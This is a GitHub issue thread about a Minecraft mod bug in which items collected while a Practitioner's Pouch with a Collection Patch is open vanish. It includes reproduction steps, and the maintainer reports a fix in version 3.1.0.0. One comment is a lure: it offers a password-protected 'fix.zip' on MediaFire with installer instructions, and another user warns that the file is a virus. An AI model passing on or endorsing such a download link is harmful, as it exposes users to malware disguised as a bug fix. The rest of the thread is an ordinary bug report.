### ISSUE TITLE
Practitioner's Pouch with Collection Patch makes items disappear when held open

### ISSUE THREAD

**Issue by Mourdida** [Mithion/Mana-And-Artifice#925]
**Describe the bug**
A Practitioner's Pouch with a Collection Patch will work only if the Pouch is not currently held open. In that case, the items will simply vanish. Reopening the Pouch does not result in the amount of items being refreshed.
Example 1: I have a stick in my pouch, I drop another one on the ground and collect it with the Pouch open. The second stick disappears. With no stick in my pouch it goes in my inventory. With the Pouch not open, it goes in the Pouch.
Example 2: I have an upgraded Pouch with a Glyph Patch. I have a White Glyph in the Glyph Patch inventory, I drop another one on the ground and collect it with the Pouch open. The second glyph disappears. Doing the same with the Glyph Patch inventory open has the same result. With no Glyph in my pouch it goes in my inventory. With the Pouch not open, it goes in the Glyph Patch inventory.

**To Reproduce**
1. Get a Practitioner's Pouch
2. Improve it with a Collection Patch
3. While looking at the ground, open the Pouch
4. Place one stackable item in the Pouch
5. While being in the Pouch GUI, drop another of this stackable item so that you will collect it

**Expected behavior**
The dropped collected item should enter the pouch and not vanish.

**Version Information (please complete the following information):**
 - Mod Version: 3.0.0.24
 - Forge Version 47.3.0

**Edit**
Actually a duplicate of https://github.com/Mithion/Mana-And-Artifice/issues/751#issue-2245089944

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youzi-2333** [comment]
Don't download this file, this is a computer virus.

**Comment by Mithion** [comment]
Resolved in 3.1.0.0
